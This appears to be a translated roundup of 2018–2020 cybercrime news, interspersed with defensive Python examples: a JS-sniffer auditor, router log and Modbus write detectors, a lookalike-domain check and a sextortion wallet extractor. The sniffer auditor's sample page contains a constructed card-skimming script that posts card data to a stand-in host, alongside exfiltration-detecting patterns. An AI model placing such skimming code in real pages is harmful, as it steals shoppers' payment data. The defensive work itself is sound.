In early May 2020, the Prosecutor General's Office of Germany issued an arrest warrant for Dmitry Badin, who is accused of cyber attacks on the Bundestag. The 29-year-old Russian has been put on the international wanted list. Read more here.
Revealed 1.3 thousand malware with the name of video conferencing services
In mid-April 2020, Kaspersky Lab announced the detection of about 1.3 thousand malicious programs that disguise themselves as popular video conferencing services, including Zoom, Webex and Slack.
According to the Russian antivirus developer, about 200 types of threats are distributed with the help of such a scheme, mainly advertising applications such as DealPly and DownloadSponsor. Both are installers that display ads or load advertising modules.
According to Kaspersky Lab, the danger of advertising software that mimics the names of such services should not be underestimated. As a result of attacks by such programs, a person's confidential information may end up on third-party servers without their consent. Moreover, the range of data that such programs collect is really diverse: user preferences, search history, geolocation and much more, the company explained.
Platforms for online conferences have now gained great popularity in the world: they are used in large and small companies to organize video conferencing, and ordinary users turn to them to communicate with friends and family, so we cannot exclude that the number of malicious files that exploit the names of such services will grow in the near future, commented Kaspersky Lab security expert Denis Parinov. |
As for the popularity of this or that service among cybercriminals, the shares were distributed as follows: in the first place Zoom (42.42%), the second went to WebEx (22.51%), the third - GoToMeeting (12.86%).
In addition, threats were found that hide under the guise of .lnk files (application shortcuts). The vast majority of these files actually turned out to be malicious elements that exploit vulnerabilities in various programs.[13]
How cybercriminals make millions from coronavirus
On March 13, 2020, the antivirus company Eset released a message about how cybercriminals are profiting from the coronavirus.
According to experts, attackers are spreading news on behalf of the World Health Organization (WHO), urging users to follow malicious links to obtain allegedly secret and extremely important information about the virus. In this way they steal personal information and payment data, gaining access to the victims' accounts. Eset recommends being more careful and checking the e-mail address from which the message came: for example, the addresses @who.com, @who.org or @who-safety.org are not related to WHO.
Fraudsters also resort to fake charity actions, creating mailings calling for a donation to find a coronavirus vaccine for children in China.
In addition, fraud with fake ads for the sale of medical masks and hand sanitizers is gaining popularity. With their help, attackers lure out users' credit card data and steal money from their accounts. According to Sky News, in February 2020 alone criminals in the UK earned at least 800 thousand pounds ($1 million) from such a campaign.
Eset advises not to succumb to panic in society and be especially attentive to any resources and mailings containing a mention of the coronavirus. It is necessary to beware of fraudulent charities or crowdfunding campaigns aimed at combating the epidemic, as well as ignore messages that request your personal or payment information. Another measure of protection against cybercriminals is to use comprehensive antivirus solutions with email protection modules and phishing protection.[14]
Cybercriminals detained in Indonesia who infected hundreds of online stores around the world
On January 27, 2020, it became known that the Indonesian cyber police, together with Interpol and Group-IB, detained members of a criminal group who infected hundreds of online stores in Australia, Brazil, Great Britain, Germany, Indonesia, the USA and other countries of the world with JavaScript sniffers, a popular type of malicious code. There are also Russian and Ukrainian users among the victims. The criminals stole buyers' bank card data and used it to buy gadgets and luxury goods. The elimination of this criminal group was the first successful operation against JS sniffer operators in the Asia-Pacific region (APAC).
As reported, the joint operation "Night Fury" of the Indonesian cyber police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and the Group-IB investigation department at APAC was carried out in December 2019 - as a result, three Indonesian residents aged 23 to 35 were arrested. All of them are charged with stealing electronic data using GetBilling sniffers. The operation in 5 other regions of the Asia-Pacific region continues.
The GetBilling sniffer family was first described in Group-IB's Crime Without Punishment report in April 2019. JavaScript sniffers are a popular type of malicious code that is used in attacks on online stores to steal customers' personal and payment data: bank card numbers, names, addresses, logins, phone numbers and user data from payment systems. Group-IB Threat Intelligence has been tracking the GetBilling JS sniffer family since 2018. An analysis of infrastructure controlled by the arrested Indonesian GetBilling operators found they managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America and several other countries.
In 2019, the team of the Group-IB investigation department managed to establish that part of the GetBilling infrastructure was deployed in Indonesia. INTERPOL's ASEAN Desk promptly informed Indonesia's cyber police. Although the operators of the GetBilling sniffer tried to hide their location (for example, the criminals always used a VPN to connect to the server that collected stolen data and controlled the sniffer, and paid for hosting services and domains only with stolen cards), Group-IB experts, together with local police officers, managed to collect evidence that the group worked from Indonesia, and then to follow the trail of the suspects themselves.
In today's digital world, cybercriminals are very quickly adopting advanced technologies in order to hide their illegal activities and to steal large amounts of personal data for financial enrichment. In order to ensure that law enforcement agencies have access to the information necessary to combat cybercrime, a strong and fruitful partnership between the police and information security experts is required, said Craig Jones, Director of Cybercrime Investigation at INTERPOL. |
This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia but attacked e-commerce resources around the world, which made it difficult to collect evidence, find victims and prosecute. However, international cooperation and data sharing can help effectively counteract current cyber threats. Thanks to the operational actions of the Indonesian cyber police and Interpol, Night Fury became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an example of a coordinated cross-border fight against cybercrime, said Vesta Matveeva, Head of Information Security Incident Investigation at Group-IB APAC. |
During the search, the police seized laptops, mobile phones from various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment data was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian sites below market value. The suspects have already been charged with stealing electronic data - a crime punishable by up to ten years in prison under Indonesia's criminal code. The investigation is ongoing.
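The GetBilling passage above describes what a JS sniffer does (injected script on a checkout page that reads payment fields and sends them to an attacker-controlled host) but not how a shop operator would notice one. The following is an added example, not Group-IB's tooling: it scans a checkout page's HTML for the two signals a sniffer leaves, namely script sources loaded from hosts outside the store's own allowlist, and inline scripts that both touch payment form fields and make a network call. The allowlist, field names and sample page are constructed for illustration.

```python
"""Audit a checkout page for JS-sniffer indicators (added example, constructed data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts the store legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}
# Heuristics: payment-field names and ways of sending data off the page.
PAYMENT_FIELDS = re.compile(r"card|cvv|cvc|expir|cardholder", re.I)
NETWORK_CALLS = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|\.src\s*=|WebSocket\(", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # script text may arrive in several chunks
            self.inline[-1] += data


def audit_page(html: str, page_host: str) -> list:
    """Return (finding_type, detail) pairs for a page served from page_host."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname or page_host      # relative URL -> same host
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("unknown_script_host", host))
    for body in p.inline:
        if PAYMENT_FIELDS.search(body) and NETWORK_CALLS.search(body):
            findings.append(("inline_exfil_pattern", body.strip()[:60]))
    return findings


# Constructed sample page: one legitimate CDN, one unknown host, one inline
# script shaped like an injected sniffer, one harmless inline script.
SAMPLE_PAGE = """
<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/jquery.js"></script>
<script src="https://static-analytics.example/lib.js"></script>
<script>
  // constructed stand-in for injected sniffer code
  var d = document.querySelector('[name=cardnumber]').value;
  fetch('https://static-analytics.example/c', {method: 'POST', body: d});
</script>
<script>console.log('legit inline init');</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE, "shop.example"):
        print(f"{kind}: {detail}")
```

The check is deliberately allowlist-based: on a payment page the set of legitimate script origins should be small and known, so any new host is worth a look even before the inline heuristics fire.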
Sexual extortion through smart cameras
In mid-January 2020, researchers sounded the alarm over a wave of a new type of fraud - sexual extortion amid panic over the safety of smart cameras. Read more here.
2019
The number of attacks on routers has grown tens of times
The number of attacks on routers grew dozens of times over in 2019: in January about 9-10 million attempts per month were recorded, by December already 250 million. This is evidenced by data from Trend Micro.
According to experts, hacking routers takes quite a short time, since many of these devices have well-known default passwords. Attackers infect the router with a virus which, after a successful hacking attempt, forces it to automatically try to hack other users' routers.
Another reason for the growing number of attacks on such equipment is the competition between different groups of cybercriminals who try to compromise as many user routers as possible in order to connect them to their botnet networks.
In the future, botnets are sold on specialized resources in the form of a tool for carrying out DDoS attacks, or are offered as a tool for anonymizing various kinds of illegal actions, including data theft, capturing accounts or cheating clicks. It is noted that the competition in this segment is so serious that hackers remove any other people's malware that is found on hacked devices.
The authors of the study also indicate that in the context of the COVID-19 pandemic and the increase in the scale of remote work, this problem has become more pressing.
To protect yourself from hacking, Trend Micro recommends following several tips:
- check the router log for suspicious activity, strange connections, and other anomalies;
- systematically update the firmware version on the router;
- use a complex and hard-to-guess password, while changing it from time to time;
- disable remote login, allowing you to connect to the router only from the local network.[15]
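The first of Trend Micro's tips above, checking the router log, is the one that needs some judgement about what "suspicious" looks like. The following is an added example, not Trend Micro's code, that applies two of the patterns the section describes to constructed router log lines: a burst of failed admin logins from one address (default-credential guessing) and an admin session arriving from outside the LAN (remote login left enabled). The log format is an approximation of a typical syslog-style consumer router log, not any vendor's exact format.

```python
"""Flag brute-force and remote-admin anomalies in router logs (added example)."""
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample log lines, not from a real device. 203.0.113.0/24 is a
# documentation range standing in for a WAN-side address.
SAMPLE_LOG = """\
Jan 12 03:14:01 router authpriv.warn login: failed for admin from 203.0.113.7
Jan 12 03:14:02 router authpriv.warn login: failed for admin from 203.0.113.7
Jan 12 03:14:03 router authpriv.warn login: failed for root from 203.0.113.7
Jan 12 03:14:04 router authpriv.warn login: failed for admin from 203.0.113.7
Jan 12 03:14:05 router authpriv.warn login: failed for admin from 203.0.113.7
Jan 12 03:14:06 router authpriv.info login: success for admin from 203.0.113.7
Jan 12 08:02:11 router authpriv.info login: success for admin from 192.168.1.20
Jan 12 09:30:45 router daemon.info dhcp: lease 192.168.1.33 to aa:bb:cc:dd:ee:ff
"""

LOGIN_RE = re.compile(
    r"login: (?P<result>failed|success) for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

# LAN-side ranges: RFC 1918 plus link-local and loopback.
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]


def is_local(ip: str) -> bool:
    """True if the address belongs to the LAN side of the router."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def analyze(log_text: str, fail_threshold: int = 5) -> dict:
    """Summarize login anomalies in router log text."""
    failures = Counter()
    users_tried = defaultdict(set)
    remote_success = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if not m:
            continue                      # not a login event (DHCP, etc.)
        ip, user, result = m["ip"], m["user"], m["result"]
        if result == "failed":
            failures[ip] += 1
            users_tried[ip].add(user)
        elif not is_local(ip):
            remote_success.append((ip, user))   # admin login from the WAN side
    brute_force = {ip: n for ip, n in failures.items() if n >= fail_threshold}
    # A success from an address that was just guessing passwords is the worst case.
    compromised = [ip for ip, _ in remote_success if ip in brute_force]
    return {
        "brute_force_sources": brute_force,
        "users_tried": {ip: sorted(u) for ip, u in users_tried.items()},
        "remote_admin_logins": remote_success,
        "likely_compromised": compromised,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Any entry in `remote_admin_logins` is itself a finding, because with remote login disabled (the last tip in the list) that line should never appear at all.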
27% of companies in the world faced cyber attacks on employees' smartphones
In 2019, 27% of companies in the world faced cyber attacks on employee smartphones, according to data from information security solutions developer Check Point Software Technologies.
We are now witnessing an epidemic of mobile advertising software, one of the most common forms of cyber threats aimed at collecting personal information from the user's device. Approximately 4 billion people access the Internet from a smartphone. However, companies rarely care about the security of employees' mobile devices, Check Point said. |
The company notes that to steal corporate data and penetrate the organization's network, attackers only need to hack one mobile device belonging to an employee. Mobile threats are constantly being improved, and more and more fraudsters are using advertising malicious tools. They show advertising messages on a smartphone and are used by cybercriminals to carry out sixth-generation cyber attacks, Check Point noted.
Experts cite the Agent Smith malware, which was discovered in 2019, as one example of the new mobile adware. Then Agent Smith infected about 25 million mobile devices around the world, while users did not even notice it. The program imitated the Google application and exploited all known vulnerabilities in the Android system, automatically replacing installed applications with versions containing malicious code. Agent Smith also used device resources, displaying fake ads that could steal bank credentials and listen to conversations.
Information security specialists recommend downloading applications only from official stores, regularly updating the OS and software on smartphones, not allowing applications to work in the background, and monitoring access rights.[16]
Hackers attack gas stations and steal motorists' bank data
In mid-December 2019, Visa warned customers that hackers had begun attacking gas stations by injecting malware into corporate networks in order to steal motorists' payment card data.
According to a Visa report, the hackers moved away from the old method of stealing bank data, in which physical skimmers were installed at gas stations. Analysts identified two incidents in which attackers injected malware directly into corporate merchant networks. By penetrating the IT infrastructure of retail chains, the hackers gained access to vending machines containing unencrypted credit and debit card data. To spread the malware, the hackers used the companies' email, sending letters from fake accounts.
Analysts at Visa noted that fuel outlets often neglect basic security technologies to protect card data, such as end-to-end encryption or tokenization. In addition, Visa's report notes that many gas stations still rely on magnetic stripe card readers rather than chip cards, raising the risk of hacking.
Any business that accepts, stores, processes and transfers payment card data must comply with PCI standards. However, a December 2019 Verizon survey of more than 300 organizations found that only 37% of them consistently ensure full compliance with all security requirements.
One proposed method of dealing with attackers is network segmentation. It not only requires more skill and time from hackers to penetrate the right part of the network, but also creates detection points where defenders can track an attacker's activity.[17]
The largest hacker group in history declassified
In early December 2019, the US Treasury Department named Evil Corp the largest hacker group in history and said it was based in Moscow. Read more here
Hackers steal hotel guests' credit card data
At the end of November 2019, it became known about a series of cyber attacks that hit hotels around the world. The hackers are trying to steal credit card data stored in the IT systems of the hotels themselves, as well as of travel agencies.
The new malicious campaign affected at least 20 representatives of the hotel business in Brazil, Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey, Kaspersky Lab reported.
To collect information from clipboards, printer devices and screenshots of documents, the attackers use remote administration Trojans, distributing them through malicious Word, Excel and PDF attachments in phishing emails. The letters, which imitate official requests for group reservations from real people at real companies, look very convincing: they include copies of official documents and detailed explanations of why this particular hotel was chosen. The only thing that gives away the fake is errors in the spelling of the company's domain.
Attackers not only use remote access to infected computers themselves, but also sell it on illegal forums. The campaign involves several cyber groups, including RevengeHotels and ProCC.
According to the Bit.ly service, which was used to shorten the malicious link, it was distributed in many countries besides those listed above, which means that the amount of compromised data may be much larger.
Kaspersky Lab recommends that travelers use a virtual payment card to book a hotel through online travel agencies, and either a virtual wallet or a card with a limited amount of money in their account for local settlement.[18]
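Two passages above end with the same practical advice: Eset says to check the sender address against the organization it claims to be (who.com, who.org and who-safety.org are not WHO), and the hotel campaign's only tell is a misspelled company domain. The following is an added example, not Eset's or Kaspersky Lab's code, that turns that advice into a mail-gateway style check: it extracts the sender domain and classifies it as trusted, lookalike (same name under another TLD, brand name embedded in a longer domain, or a one- or two-character typo of a real domain) or unrelated. The trusted-domain table and sample headers are constructed; who.int is WHO's actual domain, the travel company and its domain are invented.

```python
"""Classify e-mail sender domains against the brands they claim (added example)."""
from email.utils import parseaddr

# Constructed allowlist: brand -> domains that brand actually uses.
TRUSTED = {
    "WHO": {"who.int"},
    "Example Travel Ltd": {"example-travel.com"},   # hypothetical company
}


def sender_domain(from_header: str) -> str:
    """Return the lowercased domain of a From: header, or '' if malformed."""
    _, email = parseaddr(from_header)
    if "@" not in email:
        return ""
    return email.rsplit("@", 1)[1].lower().strip(".")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; 1-2 between two different domain labels suggests a typo-squat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(from_header: str, claimed_brand: str) -> str:
    """'trusted', 'lookalike' or 'unrelated' relative to the brand the mail claims."""
    domain = sender_domain(from_header)
    good = TRUSTED.get(claimed_brand, set())
    if not domain:
        return "unrelated"
    if domain in good:
        return "trusted"
    label = domain.split(".")[0]
    for g in good:
        glabel = g.split(".")[0]
        same_name_other_tld = label == glabel            # who.com vs who.int
        brand_embedded = glabel in label                 # who-safety.org
        # distance rule only for labels long enough that 1-2 edits are meaningful
        typo = len(glabel) >= 5 and edit_distance(label, glabel) <= 2
        if same_name_other_tld or brand_embedded or typo:
            return "lookalike"
    return "unrelated"


# Constructed (claimed brand, From: header) pairs.
SAMPLE_MESSAGES = [
    ("WHO", "World Health Organization <alert@who.int>"),
    ("WHO", "WHO Safety Team <info@who-safety.org>"),
    ("WHO", "WHO <news@who.com>"),
    ("Example Travel Ltd", "Bookings <groups@examp1e-travel.com>"),
    ("Example Travel Ltd", "Bookings <groups@example-travel.com>"),
    ("WHO", "Promo <x@unrelated-shop.example>"),
]


def triage(messages):
    """Classify each sample message; returns (header, verdict) pairs."""
    return [(hdr, classify_sender(hdr, brand)) for brand, hdr in messages]


if __name__ == "__main__":
    for hdr, verdict in triage(SAMPLE_MESSAGES):
        print(f"{verdict:10} {hdr}")
```

The brand the message "claims" has to come from somewhere; in practice it is the display name or the letterhead text, which is exactly the part the attacker controls, so the verdict should gate on the domain and never on the display name alone.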
Belarusian stole 630 thousand euros from banks and returned money with bitcoins
On November 12, 2019, the Investigative Committee of Belarus announced the investigation of a criminal case on embezzlement of funds from accounts of foreign banks. A 28-year-old resident of Grodno, involved in the crimes, was arrested with the assistance of the American FBI. Read more here.
Officials around the world attacked via WhatsApp
At the end of October 2019, it became known about a large-scale hacker attack on high-ranking officials around the world through WhatsApp. Cybercriminals exploited a vulnerability in the messenger to gain access to the smartphones of more than 1.4 thousand users. Read more here.
Fortinet 2019 Operational Technology Security Trends Report
- In 2018, the number of attacks aimed at outdated OT system software increased significantly
- Cybercriminals take advantage of the lack of a standardized protocol for OT networks
- Attacks on OT systems do not differentiate by geography or industry
- 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus
After analyzing 2018 data[19], the researchers identified many IT-based attacks aimed primarily at industrial networks whose software has not been updated for a long time, since such attacks on IT systems themselves are no longer effective. In addition, there has been an increase in the number of attacks directed at SCADA and ICS.
Such threats often target the most vulnerable parts of OT networks and exploit difficulties caused by the lack of standardization of protocols. It is also noteworthy that such attacks do not differentiate by geography or industry - in 2018 there was an increase in all directions and in all regions of the world.
Fortinet experts also identified an alarming trend of increasing prevalence of exploits for almost every ICS/SCADA vendor. In addition to attacks on non-updated OT systems, 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus. Cybercriminals also use to their advantage the wide range of OT protocols that have no single standard and differ depending on the functionality of the system, geography and industry. This makes it difficult for vendors around the world to develop OT security solutions.
In general, the study showed that the risks associated with IT/OT convergence are very real and should be taken seriously by any organization that has begun connecting its industrial systems to IT networks. Attackers will continue to exploit the slower replacement and update cycles of technology in enterprises, and this trend is likely to continue for years. The best way to counter new threats is to adopt and implement a comprehensive strategic approach that simplifies the operation of OT systems and involves all IT and OT experts in the organization.
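The report singles out Modbus as one of the protocols on which most new threats were seen, and Modbus/TCP is a good illustration of why: it carries no authentication, so whether a write to a PLC is legitimate depends entirely on which host sent it. The following is an added example, not Fortinet's code: it decodes the Modbus/TCP MBAP header and function code and raises an alert when a state-changing function (write coil/register) arrives from a host that is not an authorized engineering station, which is the kind of visibility the report says OT networks lack. The allowlist and the captured frames are constructed; the header layout and function codes follow the public Modbus specification.

```python
"""Detect unauthorized Modbus/TCP writes from constructed traffic (added example)."""
import struct

# Function codes from the Modbus specification.
WRITE_CODES = {5: "Write Single Coil", 6: "Write Single Register",
               15: "Write Multiple Coils", 16: "Write Multiple Registers"}
READ_CODES = {1: "Read Coils", 2: "Read Discrete Inputs",
              3: "Read Holding Registers", 4: "Read Input Registers"}

# Constructed allowlist: the only hosts permitted to change PLC state.
ENGINEERING_STATIONS = {"10.10.1.5"}


def parse_mbap(frame: bytes) -> dict:
    """Decode MBAP header (transaction id, protocol id, length, unit id) + function code.

    The length field counts everything after itself: unit id, function code, data."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"not Modbus (protocol id {proto})")
    if length != len(frame) - 6:
        raise ValueError("length field does not match frame size")
    fc, pdu = frame[7], frame[8:]
    info = {"tid": tid, "unit": unit, "fc": fc, "pdu": pdu}
    if fc in (5, 6) and len(pdu) >= 4:            # single write: address, value
        info["address"], info["value"] = struct.unpack(">HH", pdu[:4])
    elif (fc in (15, 16) or fc in READ_CODES) and len(pdu) >= 4:   # address, count
        info["address"], info["count"] = struct.unpack(">HH", pdu[:4])
    return info


def audit(packets) -> list:
    """packets: iterable of (src_ip, frame). Returns (src, alert_type, detail) tuples."""
    alerts = []
    for src, frame in packets:
        try:
            m = parse_mbap(frame)
        except ValueError as e:
            alerts.append((src, "malformed", str(e)))
            continue
        if m["fc"] in WRITE_CODES and src not in ENGINEERING_STATIONS:
            detail = f"{WRITE_CODES[m['fc']]} addr={m.get('address')} unit={m['unit']}"
            alerts.append((src, "unauthorized_write", detail))
    return alerts


def build_frame(tid: int, unit: int, fc: int, payload: bytes) -> bytes:
    """Assemble a Modbus/TCP request (used here only to construct the sample capture)."""
    return struct.pack(">HHHB", tid, 0, len(payload) + 2, unit) + bytes([fc]) + payload


# Constructed capture: an HMI reading registers, an engineering station writing,
# an unknown host forcing a coil, and a frame with a non-Modbus protocol id.
SAMPLE_PACKETS = [
    ("10.10.1.20", build_frame(1, 1, 3, struct.pack(">HH", 0, 10))),
    ("10.10.1.5", build_frame(2, 1, 6, struct.pack(">HH", 40, 1200))),
    ("10.10.1.77", build_frame(3, 1, 5, struct.pack(">HH", 12, 0xFF00))),
    ("10.10.1.77", b"\x00\x04\x00\x01\x00\x02\x01\x03"),
]

if __name__ == "__main__":
    for src, kind, detail in audit(SAMPLE_PACKETS):
        print(f"{src:12} {kind:18} {detail}")
```

Reads are left unflagged on purpose; in a segmented OT network the same allowlist idea extends naturally to "which hosts may even read unit N", but the write rule is the one with direct physical consequences and the one to deploy first.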
The price of hacking
The costs of hacker attacks pay off immediately after the first theft, according to a study of the economy of hackers from Positive Technologies. The initial cost of a hacker attack on financial organizations will be about 45-55 thousand US dollars, experts reported in May 2019.
A monthly subscription to a service for creating documents with malware costs approximately 2.5 thousand US dollars, tools for creating malicious files cost $300, the source code of a malware loader from $1.5 thousand, and a program for exploiting vulnerabilities about $10 thousand; legitimate tools that hackers can use were estimated by market experts at 30-40 thousand dollars.
The smallest costs go to sending malware. So, according to the expert, they amount to about 1 thousand dollars per month.
Fraudster lured $123 million from Google and Facebook
At the end of March 2019, the US Department of Justice indicted a Lithuanian citizen who lured $123 million from Google and Facebook. A fraudster who pleaded guilty deceived American companies by compromising a corporate e-mail. Read more here.
Mass detentions of shadow Internet users
At the end of March 2019, it became known about the mass detentions of criminals who conducted their illegal activities on the shadow Internet. Read more here.
Mini-cameras installed in the rooms of dozens of hotels. You could spy on guests for $50 a month
In mid-March 2019, it became known that mini-cameras had been installed in dozens of hotels in South Korea. Secret footage of 1,600 unsuspecting tourists was broadcast live; you could spy on guests for $50 a month.
In general, 30 hotels in ten cities of the country were involved in the scandal; two offenders have already been arrested and two more are under investigation. The cameras were hidden in digital television boxes, wall sockets and hairdryer holders, and the footage was streamed online, the National Police Agency's Cyber Investigation Unit said in a statement. More than 4,000 participants were registered on the broadcast site, 97 of whom paid to access the cameras monthly. According to police, between November 2018 and March 2019, this service brought violators more than $6,000.
This is not the first time South Korea has faced such a situation: in 2012, more than 2,400 cases of illegal filming were registered in the police, in 2017 there are already more than 6,400 cases, and this figure is growing. In 2018, tens of thousands of women took to the streets of Seoul and other cities to protest such violations under the slogan "My life is not your porn!"
In response, Seoul has set up a special group of female inspectors who conduct regular inspections of about 20,000 of the city's public toilets to search for hidden cameras. However, critics condemn this step as a superficial measure. Police activity is not limited to this: in January 2019, the co-owner of the South Korean porn site Soranet was sentenced to four years in prison and ordered to pay a fine of $1.26 million. Soranet, which closed in 2018, was a popular site for uploading videos and photos taken with hidden cameras.[20]
Fraudsters, posing as technical support for Microsoft, installed viruses
At the end of February 2019, Baljinder Singh, the owner of Devine Technical Services, was imprisoned; posing as Microsoft technical support, he offered users to remove viruses from their computers but in fact installed malware to steal money. Read more here.
2018
Sex blackmail on the Internet is gaining popularity
In August 2018, it became known about the growing popularity of a method of extorting money via the Internet. Cyber fraudsters blackmail users by threatening to tell their friends and relatives that they watched porn.
Hackers send an email in which they attach the logins and passwords used by the victim, which were most likely leaked earlier. The authors of the message claim that they hacked the webcam and filmed a person watching pornographic videos and what they were doing at this time. Then the scammers demand a ransom in bitcoins so that they do not send out the video that they allegedly have.
In one of these letters, the following was written:
I know this is your password. We first recorded a video that you watched (you taste good, haha) and then recorded from your webcam (yes, exactly where you do dirty business).
In this message, hackers demand to transfer $1,400 to a bitcoin wallet within 24 hours. As evidence, they express their willingness to send an intimate video to several friends.
Users who are afraid of a tarnished reputation agree to the demands of scammers.
According to Suman Kar, CEO of the cybersecurity company Banreach, speaking to Motherboard, fraudsters using this scheme were able to earn $500,000 with minimal effort, relying on nothing more than old passwords.
Banreach studied about 770 e-wallets that victims had reported in porn blackmail messages. Most (540) of the wallets were empty, but the remaining 230 showed more than 1,000 transactions totalling 71 bitcoins.[21]
Some attackers find victims on social networks and webcam chats, get acquainted with them on behalf of an attractive woman or man and involve the user in a frank conversation, the purpose of which is virtual sexual intercourse. As soon as the criminals manage to capture the victim on camera or get a screenshot of the intimate correspondence, they begin to blackmail her, threatening to publish video and photo materials in the public domain.
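A campaign like the one described above is usually analysed by extracting the wallet addresses and ransom demands from the messages that victims report, which is how a tally such as Banreach's is built. The following is an added example, not code from the page or from Banreach: over a few constructed sample e-mails it scores each message against the lure phrases typical of the campaign, extracts legacy Bitcoin addresses with a regular expression, validates them with Base58Check so that mistyped or garbled addresses in reports are not counted, and tallies how many reports name each wallet. The sample messages, the "hunter2" password and the scoring threshold are constructed assumptions; the valid address used is Bitcoin's well-known genesis-block address, and the invalid one is that address with its last character changed.

```python
import hashlib
import re
from collections import Counter

# Legacy (Base58Check) Bitcoin addresses as they appear in extortion mail.
# bech32 ("bc1...") addresses are out of scope for this example.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
USD_RE = re.compile(r"\$\s?(\d[\d,]*)")
# Phrases typical of the campaign; each one present raises the lure score.
LURE_TERMS = ("password", "webcam", "video", "bitcoin", "24 hours", "friends")
SUSPECT_THRESHOLD = 3  # assumption: three lure phrases plus a wallet = suspect

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed sample messages (not real reports). The first two name the
# genesis-block address; the third names a corrupted copy of it; the fourth
# is benign mail that happens to mention a dollar amount.
SAMPLE_MESSAGES = [
    "I know that hunter2 is your password. I recorded your webcam while you "
    "watched a video. Send $1,400 in bitcoin to "
    "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa within 24 hours or the video goes "
    "to your friends.",
    "Your password is still hunter2. Webcam footage of you and the video you "
    "watched will go to your friends unless 0.2 bitcoin reaches "
    "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa in 24 hours.",
    "Pay $900 in bitcoin to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb or the webcam "
    "video is sent to your friends and your password is leaked.",
    "Reminder: the team lunch is at noon on Friday, bring $10 for the collection.",
]


def b58decode(s: str) -> bytes:
    """Decode a Base58 string; raises ValueError for characters outside the alphabet."""
    n = 0
    for ch in s:
        n = n * 58 + B58.index(ch)  # ValueError for 0, O, I, l
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(s) - len(s.lstrip("1"))  # each leading '1' encodes a zero byte
    return b"\x00" * leading + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def triage(messages):
    """Score each message and pull out wallet addresses and the dollar demand."""
    records = []
    for msg in messages:
        text = msg.lower()
        score = sum(term in text for term in LURE_TERMS)
        addrs = BTC_RE.findall(msg)
        amt = USD_RE.search(msg)
        records.append({
            "score": score,
            "addresses": addrs,
            "valid_addresses": [a for a in addrs if is_valid_btc_address(a)],
            "amount_usd": int(amt.group(1).replace(",", "")) if amt else None,
            "suspect": score >= SUSPECT_THRESHOLD and bool(addrs),
        })
    return records


def wallet_counts(records):
    """How many suspect messages name each valid wallet (the Banreach-style tally)."""
    return Counter(a for r in records if r["suspect"] for a in r["valid_addresses"])


if __name__ == "__main__":
    recs = triage(SAMPLE_MESSAGES)
    for r in recs:
        print(r)
    print(wallet_counts(recs))
```

The checksum step matters in practice: a wallet copied by hand into a report with one wrong character would otherwise be counted as a distinct attacker wallet. Only the valid addresses from suspect messages are worth passing on to blockchain analysis or to mail filters.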
Cybercriminals stole about $1.2 billion in cryptocurrency
Since the beginning of 2017, cybercriminals have stolen about $1.2 billion in cryptocurrency. Such data are contained in the report of the international non-profit organization Anti-Phishing Working Group (APWG). Excerpts from the study were published by Reuters on May 24, 2018.
In an interview with the agency, APWG Chairman Dave Jevans, who also heads CipherTrace, a cryptocurrency security company, said that stealing tokens by cybercriminals is a common problem, in addition to drug smuggling and money laundering using cryptocurrencies.
According to Dave Jevans, of the indicated amount of $1.2 billion, only about 20% or less were returned by law enforcement officers. According to him, law enforcement agencies around the world are busy tracking down attackers involved in the theft of digital money.[22]
